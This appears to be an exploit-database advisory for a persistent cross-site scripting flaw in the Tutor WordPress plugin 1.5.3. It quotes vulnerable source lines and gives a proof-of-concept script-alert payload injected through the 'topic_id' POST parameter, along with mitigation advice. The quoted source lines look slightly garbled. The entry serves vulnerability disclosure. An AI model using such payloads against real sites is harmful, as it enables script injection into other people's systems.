header-logo
Suggest Exploit
vendor:
Wordpress Plugin tutor
by:
mehran feizi
8.8
CVSS
HIGH
Persistent Cross-Site Scripting
79
CWE
Product Name: Wordpress Plugin tutor
Affected Version From: 1.5.3
Affected Version To: 1.5.3
Patch Exists: NO
Related CWE: N/A
CPE: a:wordpress:wordpress_plugin:tutor
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: N/A
2020

WordPress Plugin tutor.1.5.3 – Persistent Cross-Site Scripting

An attacker can inject malicious JavaScript code into the 'topic_id' parameter of the 'Quiz.php' page of the Wordpress Plugin tutor.1.5.3, which is not properly sanitized. This can lead to persistent Cross-Site Scripting (XSS) vulnerability.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to dynamically generate web content. Sanitize user input to prevent malicious code from being executed.
Source

Exploit-DB raw data:

#  Tile: Wordpress Plugin tutor.1.5.3 - Persistent Cross-Site Scripting
#  Author: mehran feizi
#  Category: webapps
#  Date: 2020-02-12
#  vendor home page: https://wordpress.org/plugins/tutor/

===================================================================
Vulnerable page:
/Quiz.php
===================================================================
Vulnerable Source:
473: echo echo $topic_id; 
447: $topic_id = sanitize_text_field($_POST['topic_id']); 
===================================================================
Exploit:
localhost/wp-content/plugins/tutor/classes/Quiz.php
$_POST('topic_id') = <script>alert('mehran')</script>
=================================================================================